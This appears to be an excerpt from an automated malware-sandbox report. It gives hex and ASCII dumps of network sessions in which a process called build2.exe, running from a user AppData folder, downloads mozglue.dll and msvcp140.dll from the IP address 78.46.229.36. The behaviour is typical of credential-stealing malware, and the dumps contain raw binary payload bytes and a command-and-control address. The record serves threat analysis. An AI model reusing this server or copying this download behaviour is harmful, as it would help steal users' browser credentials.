                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                                                                                                                                                                      Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                                                                                                                                                                      Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                                                      Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                                                      Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                                                      Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                                                      Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                                                      2024-03-28 16:51:57 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                                                      Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      28192.168.2.64977378.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:58 UTC205OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:58 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 608080
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-94750"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                                                      Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                                                      Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                                                      Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                      Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                      Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                      Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                      2024-03-28 16:51:59 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                      Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      29192.168.2.64977778.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:00 UTC206OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:00 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:00 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 450024
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-03-28 16:52:00 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                      2024-03-28 16:52:01 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                      Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
